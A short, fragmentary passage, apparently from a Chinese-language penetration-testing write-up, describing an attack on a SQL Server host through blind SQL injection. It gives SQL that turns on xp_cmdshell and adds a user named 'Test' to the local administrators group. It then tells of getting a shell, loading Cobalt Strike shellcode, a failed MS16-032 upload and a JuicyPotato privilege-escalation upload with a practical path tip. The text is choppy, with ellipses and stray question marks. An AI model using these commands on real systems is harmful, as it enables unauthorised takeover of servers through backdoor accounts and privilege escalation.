exec sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure'xp_cmdshell', 1;RECONFIGURE;WAITFOR...Test ZjZ0ErUwPcxRsgG8E3hL /add';exec master..xp_cmdshell 'net localgroup administrators Test /add';WAITFOR...再跑一下os-shell,发现能跑绝对路径了,好兆头
?
成功弹出shell
?
因为是盲注,所以执行whoami之类的命令各种没回显,于是直接来个CS的shellcode
?
?...尝试传个ms-16-032的exp上去,直接上传失败
?...0x04:上传烂土豆EXP提权
在本地准备好一个烂土豆的EXP(注意windows路径多加个斜杠,虽然也可以不加,但试了几台机子发现加了成功率高,不知道什么原理)
upload /root/EXP/JuicyPotato